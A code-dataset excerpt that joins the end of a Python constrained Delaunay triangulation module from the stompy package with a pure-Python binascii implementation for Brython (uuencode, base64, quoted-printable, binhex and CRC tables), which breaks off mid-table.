all_segs.insert(0,[n_new,nB])
if nA!=n_new:
all_segs.insert(0,[nA,n_new])
continue
except DuplicateConstraint as exc:
if on_exists=='exception':
raise
elif on_exists=='ignore':
j=self.nodes_to_edge(nA,nB)
elif on_exists=='stop':
break
else:
assert False,"Bad value %s for on_exists"%on_exists
result_nodes.append(nB)
assert j is not None
result_edges.append(j)
return result_nodes,result_edges
def split_constraint(self,x,j):
nodes_other=self.edges['nodes'][j].copy()
j_data=unstructured_grid.rec_to_dict(self.edges[j].copy())
self.remove_constraint(j=j)
n_new=self.add_or_find_node(x=x)
js=[]
if nodes_other[0]!=n_new:
js.append( self.add_constraint(nodes_other[0],n_new) )
if n_new!=nodes_other[1]:
js.append( self.add_constraint(n_new,nodes_other[1]) )
for f in j_data:
if f in ['nodes','cells','deleted']: continue
self.edges[f][js]=j_data[f]
return n_new
def add_constrained_linestring(self,coords,
on_intersection='exception',
on_exists='exception',
closed=False):
"""
Optionally insert new nodes as needed along
the way.
on_intersection: when a constraint intersects an existing constraint,
'exception' => re-raise the exception
'insert' => insert a constructed node, and divide the new and old constraints.
on_exists' => when a constraint to be inserted already exists,
'exception' => re-raise the exception
'ignore' => keep going
'stop' => return
closed: Whether the first and last nodes are also connected
returns [list of nodes],[list of edges]
"""
nodes=[self.add_or_find_node(x=x)
for x in coords]
result_nodes=[nodes[0]]
result_edges=[]
if not closed:
ab_list=zip(nodes[:-1],nodes[1:])
else:
ab_list=zip(nodes,np.roll(nodes,-1))
for a,b in ab_list:
if on_intersection=='insert':
sub_nodes,sub_edges=self.add_constraint_and_intersections(a,b,
on_exists=on_exists)
result_nodes+=sub_nodes[1:]
result_edges+=sub_edges
if (on_exists=='stop') and (sub_nodes[-1]!=b):
print("Stopping early")
break
else:
try:
j=self.add_constraint(a,b)
except DuplicateConstraint as exc:
if on_exists=='exception':
raise
elif on_exists=='stop':
break
elif on_exists=='ignore':
j=self.nodes_to_edge(a,b)
result_nodes.append(b)
result_edges.append(j)
return result_nodes,result_edges
def bulk_init_slow(self,points):
raise Exception("No - it's really slow. Don't do this.")
def bulk_init(self,points): # ExactDelaunay
if spatial is None:
return self.bulk_init_slow(points)
# looks like centering this affects how many cells Delaunay
# finds. That's lame.
sdt = spatial.Delaunay(points-points.mean(axis=0))
self.nodes=np.zeros( len(points), self.node_dtype)
self.cells=np.zeros( sdt.vertices.shape[0], self.cell_dtype)
self.nodes['x']=points
self.cells['nodes']=sdt.vertices
# looks like it's CGAL style:
# neighbor[1] shares nodes[0] and nodes[2]
# vertices are CCW
for c in range(self.Ncells()):
for i,(a,b) in enumerate(circular_pairs(self.cells['nodes'][c])):
# first time - that would be i=0, and the first two nodes.
# but for neighbors, it's indexed by the opposite node. so the edge
# connected the nodes[0]--nodes[1] corresponds with neighbor 2.
c_nbr=sdt.neighbors[c,(i+2)%3]
# c_nbr==-1 on convex hull.
# only worry about cases where c is larger.
if c<c_nbr:
continue
if c_nbr<0:
c_nbr=self.INF_CELL
j=self.add_edge(nodes=[a,b],
cells=[c,c_nbr])
# and record in the cell, too
self.cells['edges'][c,i]=j
if c_nbr!=self.INF_CELL:
nbr_nodes=self.cells['nodes'][c_nbr]
for i_nbr in [0,1,2]:
if nbr_nodes[i_nbr]==b and nbr_nodes[(i_nbr+1)%3]==a:
self.cells['edges'][c_nbr,i_nbr]=j
break
else:
assert False
def constrained_centers(self):
"""
For cells with no constrained edges, return the circumcenter.
If return centroid.
The details may evolve, but the purpose is to get a point which
is inside the domain and can be used like a circumcenter (i.e.
approximately lies on the medial axis of the continous boundary).
"""
ccs=self.cells_center(refresh=True) # circumcenters
centroids=self.cells_centroid()
e2c=self.edge_to_cells() # recalc=True)
cell_with_constraint=np.unique( e2c[ self.edges['constrained']] )
result=ccs.copy()
result[cell_with_constraint] = centroids[cell_with_constraint]
return result
# TODO: def constrained_radii(self):
# Calculate the usual circumradius, but for centers which were
# adjusted due to a constrained edge also check point-segment
# distances.
def point_clearance(self,x,hint=None):
"""
Return the distance from point x=[p_x,p_y] to the nearest
node or constrained segment of the triangulation.
hint: To speed up consecutive queries with spatial locality, pass
a dictionary, and a new dictionary will be returned as the second
item in a tuple. The initial dictionary can be empty, or 'c':int
to give a starting face of the triangulation.
"""
if hint is not None:
loc_face,loc_type,loc_index=self.locate(x,**hint)
else:
loc_face,loc_type,loc_index=self.locate(x)
assert loc_type in (self.IN_VERTEX, self.IN_EDGE, self.IN_FACE)
face_nodes=self.cells['nodes'][loc_face]
min_clearance=dist( self.nodes['x'][face_nodes], x ).min()
for j in self.cell_to_edges(loc_face):
if self.edges['constrained'][j]:
j_clearance=point_segment_distance(x, self.nodes['x'][self.edges['nodes'][j]] )
min_clearance=min(min_clearance,j_clearance)
if hint is not None:
return min_clearance,{'c':loc_face}
else:
return min_clearance
# Issues:
# Calls like edge_to_cells do not scale well right now. In particular,
# it would be better in this code to always specify the edge, so that
# a full scan isn't necessary.
| {
"repo_name": "rustychris/stompy",
"path": "stompy/grid/exact_delaunay.py",
"copies": "1",
"size": "84123",
"license": "mit",
"hash": 3253068275557715000,
"line_mean": 38.9444444444,
"line_max": 111,
"alpha_frac": 0.4823769956,
"autogenerated": false,
"ratio": 4.084632192279679,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9970817428234852,
"avg_score": 0.019238351928965385,
"num_lines": 2106
} |
"""A pure Python implementation of binascii.
Rather slow and buggy in corner cases.
PyPy provides an RPython version too.
"""
# borrowed from https://bitbucket.org/pypy/pypy/src/f2bf94943a41/lib_pypy/binascii.py
class Error(ValueError):
def __init__(self, msg=''):
self._msg = msg
def __str__(self):
return " binascii.Error: "+self._msg
class Done(Exception):
pass
class Incomplete(Error):
pass
def a2b_uu(s):
if not s:
return ''
length = (ord(s[0]) - 0x20) % 64
def quadruplets_gen(s):
while s:
try:
yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
except IndexError:
s += ' '
yield ord(s[0]), ord(s[1]), ord(s[2]), ord(s[3])
return
s = s[4:]
try:
result = [''.join(
[chr((A - 0x20) << 2 | (((B - 0x20) >> 4) & 0x3)),
chr(((B - 0x20) & 0xf) << 4 | (((C - 0x20) >> 2) & 0xf)),
chr(((C - 0x20) & 0x3) << 6 | ((D - 0x20) & 0x3f))
]) for A, B, C, D in quadruplets_gen(s[1:].rstrip())]
except ValueError:
raise Error('Illegal char')
result = ''.join(result)
trailingdata = result[length:]
if trailingdata.strip('\x00'):
raise Error('Trailing garbage')
result = result[:length]
if len(result) < length:
result += ((length - len(result)) * '\x00')
return bytes(result, __BRYTHON__.charset)
def b2a_uu(s):
length = len(s)
if length > 45:
raise Error('At most 45 bytes at once')
def triples_gen(s):
while s:
try:
yield ord(s[0]), ord(s[1]), ord(s[2])
except IndexError:
s += '\0\0'
yield ord(s[0]), ord(s[1]), ord(s[2])
return
s = s[3:]
result = [''.join(
[chr(0x20 + (( A >> 2 ) & 0x3F)),
chr(0x20 + (((A << 4) | ((B >> 4) & 0xF)) & 0x3F)),
chr(0x20 + (((B << 2) | ((C >> 6) & 0x3)) & 0x3F)),
chr(0x20 + (( C ) & 0x3F))])
for A, B, C in triples_gen(s)]
return chr(ord(' ') + (length & 0o77)) + ''.join(result) + '\n'
table_a2b_base64 = {
'A': 0,
'B': 1,
'C': 2,
'D': 3,
'E': 4,
'F': 5,
'G': 6,
'H': 7,
'I': 8,
'J': 9,
'K': 10,
'L': 11,
'M': 12,
'N': 13,
'O': 14,
'P': 15,
'Q': 16,
'R': 17,
'S': 18,
'T': 19,
'U': 20,
'V': 21,
'W': 22,
'X': 23,
'Y': 24,
'Z': 25,
'a': 26,
'b': 27,
'c': 28,
'd': 29,
'e': 30,
'f': 31,
'g': 32,
'h': 33,
'i': 34,
'j': 35,
'k': 36,
'l': 37,
'm': 38,
'n': 39,
'o': 40,
'p': 41,
'q': 42,
'r': 43,
's': 44,
't': 45,
'u': 46,
'v': 47,
'w': 48,
'x': 49,
'y': 50,
'z': 51,
'0': 52,
'1': 53,
'2': 54,
'3': 55,
'4': 56,
'5': 57,
'6': 58,
'7': 59,
'8': 60,
'9': 61,
'+': 62,
'/': 63,
'=': 0,
}
def a2b_base64(s):
if not isinstance(s, (str, bytes, bytearray)):
raise TypeError("expected string, bytes or a bytearray, got %r" % (s,))
s = s.rstrip()
# clean out all invalid characters, this also strips the final '=' padding
# check for correct padding
def next_valid_char(s, pos):
for i in range(pos + 1, len(s)):
c = s[i]
if c < 0x7f:
try:
table_a2b_base64[chr(c)]
return chr(c)
except KeyError:
pass
return None
quad_pos = 0
leftbits = 0
leftchar = 0
res = []
for i, c in enumerate(s):
if isinstance(c, int):
c = chr(c)
if c > '\x7f' or c == '\n' or c == '\r' or c == ' ':
continue
if c == '=':
if quad_pos < 2 or (quad_pos == 2 and next_valid_char(s, i) != '='):
continue
else:
leftbits = 0
break
try:
next_c = table_a2b_base64[c]
except KeyError:
continue
quad_pos = (quad_pos + 1) & 0x03
leftchar = (leftchar << 6) | next_c
leftbits += 6
if leftbits >= 8:
leftbits -= 8
res.append((leftchar >> leftbits & 0xff))
leftchar &= ((1 << leftbits) - 1)
if leftbits != 0:
raise Error('Incorrect padding')
return bytes(''.join([chr(i) for i in res]),__BRYTHON__.charset)
table_b2a_base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"\
"0123456789+/"
def b2a_base64(s):
length = len(s)
final_length = length % 3
def triples_gen(s):
while s:
try:
yield s[0], s[1], s[2]
except IndexError:
s += b'\0\0'
yield s[0], s[1], s[2]
return
s = s[3:]
a = triples_gen(s[ :length - final_length])
result = [''.join(
[table_b2a_base64[( A >> 2 ) & 0x3F],
table_b2a_base64[((A << 4) | ((B >> 4) & 0xF)) & 0x3F],
table_b2a_base64[((B << 2) | ((C >> 6) & 0x3)) & 0x3F],
table_b2a_base64[( C ) & 0x3F]])
for A, B, C in a]
final = s[length - final_length:]
if final_length == 0:
snippet = ''
elif final_length == 1:
a = final[0]
snippet = table_b2a_base64[(a >> 2 ) & 0x3F] + \
table_b2a_base64[(a << 4 ) & 0x3F] + '=='
else:
a = final[0]
b = final[1]
snippet = table_b2a_base64[(a >> 2) & 0x3F] + \
table_b2a_base64[((a << 4) | (b >> 4) & 0xF) & 0x3F] + \
table_b2a_base64[(b << 2) & 0x3F] + '='
return bytes(''.join(result) + snippet + '\n', __BRYTHON__.charset)
def a2b_qp(s, header=False):
inp = 0
odata = []
while inp < len(s):
if s[inp] == '=':
inp += 1
if inp >= len(s):
break
# Soft line breaks
if (s[inp] == '\n') or (s[inp] == '\r'):
if s[inp] != '\n':
while inp < len(s) and s[inp] != '\n':
inp += 1
if inp < len(s):
inp += 1
elif s[inp] == '=':
# broken case from broken python qp
odata.append('=')
inp += 1
elif s[inp] in hex_numbers and s[inp + 1] in hex_numbers:
ch = chr(int(s[inp:inp+2], 16))
inp += 2
odata.append(ch)
else:
odata.append('=')
elif header and s[inp] == '_':
odata.append(' ')
inp += 1
else:
odata.append(s[inp])
inp += 1
return bytes(''.join(odata), __BRYTHON__.charset)
def b2a_qp(data, quotetabs=False, istext=True, header=False):
"""quotetabs=True means that tab and space characters are always
quoted.
istext=False means that \r and \n are treated as regular characters
header=True encodes space characters with '_' and requires
real '_' characters to be quoted.
"""
MAXLINESIZE = 76
# See if this string is using CRLF line ends
lf = data.find('\n')
crlf = lf > 0 and data[lf-1] == '\r'
inp = 0
linelen = 0
odata = []
while inp < len(data):
c = data[inp]
if (c > '~' or
c == '=' or
(header and c == '_') or
(c == '.' and linelen == 0 and (inp+1 == len(data) or
data[inp+1] == '\n' or
data[inp+1] == '\r')) or
(not istext and (c == '\r' or c == '\n')) or
((c == '\t' or c == ' ') and (inp + 1 == len(data))) or
(c <= ' ' and c != '\r' and c != '\n' and
(quotetabs or (not quotetabs and (c != '\t' and c != ' '))))):
linelen += 3
if linelen >= MAXLINESIZE:
odata.append('=')
if crlf: odata.append('\r')
odata.append('\n')
linelen = 3
odata.append('=' + two_hex_digits(ord(c)))
inp += 1
else:
if (istext and
(c == '\n' or (inp+1 < len(data) and c == '\r' and
data[inp+1] == '\n'))):
linelen = 0
# Protect against whitespace on end of line
if (len(odata) > 0 and
(odata[-1] == ' ' or odata[-1] == '\t')):
ch = ord(odata[-1])
odata[-1] = '='
odata.append(two_hex_digits(ch))
if crlf: odata.append('\r')
odata.append('\n')
if c == '\r':
inp += 2
else:
inp += 1
else:
if (inp + 1 < len(data) and
data[inp+1] != '\n' and
(linelen + 1) >= MAXLINESIZE):
odata.append('=')
if crlf: odata.append('\r')
odata.append('\n')
linelen = 0
linelen += 1
if header and c == ' ':
c = '_'
odata.append(c)
inp += 1
return ''.join(odata)
hex_numbers = '0123456789ABCDEF'
def hex(n):
if n == 0:
return '0'
if n < 0:
n = -n
sign = '-'
else:
sign = ''
arr = []
def hex_gen(n):
""" Yield a nibble at a time. """
while n:
yield n % 0x10
n = n / 0x10
for nibble in hex_gen(n):
arr = [hex_numbers[nibble]] + arr
return sign + ''.join(arr)
def two_hex_digits(n):
return hex_numbers[n / 0x10] + hex_numbers[n % 0x10]
def strhex_to_int(s):
i = 0
for c in s:
i = i * 0x10 + hex_numbers.index(c)
return i
hqx_encoding = '!"#$%&\'()*+,-012345689@ABCDEFGHIJKLMNPQRSTUVXYZ[`abcdefhijklmpqr'
DONE = 0x7f
SKIP = 0x7e
FAIL = 0x7d
table_a2b_hqx = [
#^@ ^A ^B ^C ^D ^E ^F ^G
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
#\b \t \n ^K ^L \r ^N ^O
FAIL, FAIL, SKIP, FAIL, FAIL, SKIP, FAIL, FAIL,
#^P ^Q ^R ^S ^T ^U ^V ^W
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
#^X ^Y ^Z ^[ ^\ ^] ^^ ^_
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
# ! " # $ % & '
FAIL, 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06,
#( ) * + , - . /
0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, FAIL, FAIL,
#0 1 2 3 4 5 6 7
0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, FAIL,
#8 9 : ; < = > ?
0x14, 0x15, DONE, FAIL, FAIL, FAIL, FAIL, FAIL,
#@ A B C D E F G
0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D,
#H I J K L M N O
0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, FAIL,
#P Q R S T U V W
0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, FAIL,
#X Y Z [ \ ] ^ _
0x2C, 0x2D, 0x2E, 0x2F, FAIL, FAIL, FAIL, FAIL,
#` a b c d e f g
0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, FAIL,
#h i j k l m n o
0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, FAIL, FAIL,
#p q r s t u v w
0x3D, 0x3E, 0x3F, FAIL, FAIL, FAIL, FAIL, FAIL,
#x y z { | } ~ ^?
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL, FAIL,
]
def a2b_hqx(s):
result = []
def quadruples_gen(s):
t = []
for c in s:
res = table_a2b_hqx[ord(c)]
if res == SKIP:
continue
elif res == FAIL:
raise Error('Illegal character')
elif res == DONE:
yield t
raise Done
else:
t.append(res)
if len(t) == 4:
yield t
t = []
yield t
done = 0
try:
for snippet in quadruples_gen(s):
length = len(snippet)
if length == 4:
result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
result.append(chr(((snippet[2] & 0x03) << 6) | (snippet[3])))
elif length == 3:
result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
result.append(chr(((snippet[1] & 0x0f) << 4) | (snippet[2] >> 2)))
elif length == 2:
result.append(chr(((snippet[0] & 0x3f) << 2) | (snippet[1] >> 4)))
except Done:
done = 1
except Error:
raise
return (''.join(result), done)
# should this return a bytes object?
#return (bytes(''.join(result), __BRYTHON__.charset), done)
def b2a_hqx(s):
result =[]
def triples_gen(s):
while s:
try:
yield ord(s[0]), ord(s[1]), ord(s[2])
except IndexError:
yield tuple([ord(c) for c in s])
s = s[3:]
for snippet in triples_gen(s):
length = len(snippet)
if length == 3:
result.append(
hqx_encoding[(snippet[0] & 0xfc) >> 2])
result.append(hqx_encoding[
((snippet[0] & 0x03) << 4) | ((snippet[1] & 0xf0) >> 4)])
result.append(hqx_encoding[
(snippet[1] & 0x0f) << 2 | ((snippet[2] & 0xc0) >> 6)])
result.append(hqx_encoding[snippet[2] & 0x3f])
elif length == 2:
result.append(
hqx_encoding[(snippet[0] & 0xfc) >> 2])
result.append(hqx_encoding[
((snippet[0] & 0x03) << 4) | ((snippet[1] & 0xf0) >> 4)])
result.append(hqx_encoding[
(snippet[1] & 0x0f) << 2])
elif length == 1:
result.append(
hqx_encoding[(snippet[0] & 0xfc) >> 2])
result.append(hqx_encoding[
((snippet[0] & 0x03) << 4)])
return ''.join(result)
crctab_hqx = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50a5, 0x60c6, 0x70e7,
0x8108, 0x9129, 0xa14a, 0xb16b, 0xc18c, 0xd1ad, 0xe1ce, 0xf1ef,
0x1231, 0x0210, 0x3273, 0x2252, 0x52b5, 0x4294, 0x72f7, 0x62d6,
0x9339, 0x8318, 0xb37b, 0xa35a, 0xd3bd, 0xc39c, 0xf3ff, 0xe3de,
0x2462, 0x3443, 0x0420, 0x1401, 0x64e6, 0x74c7, 0x44a4, 0x5485,
0xa56a, 0xb54b, 0x8528, 0x9509, 0xe5ee, 0xf5cf, 0xc5ac, 0xd58d,
0x3653, 0x2672, 0x1611, 0x0630, 0x76d7, 0x66f6, 0x5695, 0x46b4,
0xb75b, 0xa77a, 0x9719, 0x8738, 0xf7df, 0xe7fe, 0xd79d, 0xc7bc,
0x48c4, 0x58e5, 0x6886, 0x78a7, 0x0840, 0x1861, 0x2802, 0x3823,
0xc9cc, 0xd9ed, 0xe98e, 0xf9af, 0x8948, 0x9969, 0xa90a, 0xb92b,
0x5af5, 0x4ad4, 0x7ab7, 0x6a96, 0x1a71, 0x0a50, 0x3a33, 0x2a12,
0xdbfd, 0xcbdc, 0xfbbf, 0xeb9e, 0x9b79, 0x8b58, 0xbb3b, 0xab1a,
0x6ca6, 0x7c87, 0x4ce4, 0x5cc5, 0x2c22, 0x3c03, 0x0c60, 0x1c41,
0xedae, 0xfd8f, 0xcdec, 0xddcd, 0xad2a, 0xbd0b, 0x8d68, 0x9d49,
0x7e97, 0x6eb6, 0x5ed5, 0x4ef4, 0x3e13, 0x2e32, 0x1e51, 0x0e70,
0xff9f, 0xefbe, 0xdfdd, 0xcffc, 0xbf1b, 0xaf3a, 0x9f59, 0x8f78,
0x9188, 0x81a9, 0xb1ca, 0xa1eb, 0xd10c, 0xc12d, 0xf14e, 0xe16f,
0x1080, 0x00a1, 0x30c2, 0x20e3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83b9, 0x9398, 0xa3fb, 0xb3da, 0xc33d, 0xd31c, 0xe37f, 0xf35e,
0x02b1, 0x1290, 0x22f3, 0x32d2, 0x4235, 0x5214, 0x6277, 0x7256,
0xb5ea, 0xa5cb, 0x95a8, 0x8589, 0xf56e, 0xe54f, 0xd52c, 0xc50d,
0x34e2, 0x24c3, 0x14a0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xa7db, 0xb7fa, 0x8799, 0x97b8, 0xe75f, 0xf77e, 0xc71d, 0xd73c,
0x26d3, 0x36f2, 0x0691, 0x16b0, 0x6657, 0x7676, 0x4615, 0x5634,
0xd94c, 0xc96d, 0xf90e, 0xe92f, 0x99c8, 0x89e9, 0xb98a, 0xa9ab,
0x5844, 0x4865, 0x7806, 0x6827, 0x18c0, 0x08e1, 0x3882, 0x28a3,
0xcb7d, 0xdb5c, 0xeb3f, 0xfb1e, 0x8bf9, 0x9bd8, 0xabbb, 0xbb9a,
0x4a75, 0x5a54, 0x6a37, 0x7a16, 0x0af1, 0x1ad0, 0x2ab3, 0x3a92,
0xfd2e, 0xed0f, 0xdd6c, 0xcd4d, 0xbdaa, 0xad8b, 0x9de8, 0x8dc9,
0x7c26, 0x6c07, 0x5c64, 0x4c45, 0x3ca2, 0x2c83, 0x1ce0, 0x0cc1,
0xef1f, 0xff3e, 0xcf5d, 0xdf7c, 0xaf9b, 0xbfba, 0x8fd9, 0x9ff8,
0x6e17, 0x7e36, 0x4e55, 0x5e74, 0x2e93, 0x3eb2, 0x0ed1, 0x1ef0,
]
def crc_hqx(s, crc):
for c in s:
crc = ((crc << 8) & 0xff00) ^ crctab_hqx[((crc >> 8) & 0xff) ^ ord(c)]
return crc
def rlecode_hqx(s):
"""
Run length encoding for binhex4.
The CPython implementation does not do run length encoding
of \x90 characters. This implementation does.
"""
if not s:
return ''
result = []
prev = s[0]
count = 1
# Add a dummy character to get the loop to go one extra round.
# The dummy must be different from the last character of s.
# In the same step we remove the first character, which has
# already been stored in prev.
if s[-1] == '!':
s = s[1:] + '?'
else:
s = s[1:] + '!'
for c in s:
if c == prev and count < 255:
count += 1
else:
if count == 1:
if prev != '\x90':
result.append(prev)
else:
result.extend(['\x90', '\x00'])
elif count < 4:
if prev != '\x90':
result.extend([prev] * count)
else:
result.extend(['\x90', '\x00'] * count)
else:
if prev != '\x90':
result.extend([prev, '\x90', chr(count)])
else:
result.extend(['\x90', '\x00', '\x90', chr(count)])
count = 1
prev = c
return ''.join(result)
def rledecode_hqx(s):
s = s.split('\x90')
result = [s[0]]
prev = s[0]
for snippet in s[1:]:
count = ord(snippet[0])
if count > 0:
result.append(prev[-1] * (count-1))
prev = snippet
else:
result.append('\x90')
prev = '\x90'
result.append(snippet[1:])
return ''.join(result)
crc_32_tab = [
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
0x2d02ef8d
]
def crc32(s, crc=0):
result = 0
crc = ~int(crc) & 0xffffffff
#crc = ~long(crc) & 0xffffffffL
for c in s:
crc = crc_32_tab[(crc ^ int(ord(c))) & 0xff] ^ (crc >> 8)
#crc = crc_32_tab[(crc ^ long(ord(c))) & 0xffL] ^ (crc >> 8)
#/* Note: (crc >> 8) MUST zero fill on left
result = crc ^ 0xffffffff
if result > 2**31:
result = ((result + 2**31) % 2**32) - 2**31
return result
def b2a_hex(s):
if isinstance(s, bytes) or isinstance(s, bytearray):
conv = lambda x:x
unconv = lambda x:x
else:
conv = lambda x:ord(x)
unconv = lambda x:chr(x)
result = []
for char in s:
c = (conv(char) >> 4) & 0xf
if c > 9:
c = c + ord('a') - 10
else:
c = c + ord('0')
result.append(unconv(c))
c = conv(char) & 0xf
if c > 9:
c = c + ord('a') - 10
else:
c = c + ord('0')
result.append(unconv(c))
if isinstance(s, bytes):
return bytes(result,encoding='ascii')
if isinstance(s, bytearray):
return bytearray(result,encoding='ascii')
return ''.join(result)
hexlify = b2a_hex
table_hex = [
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,-1,-1, -1,-1,-1,-1,
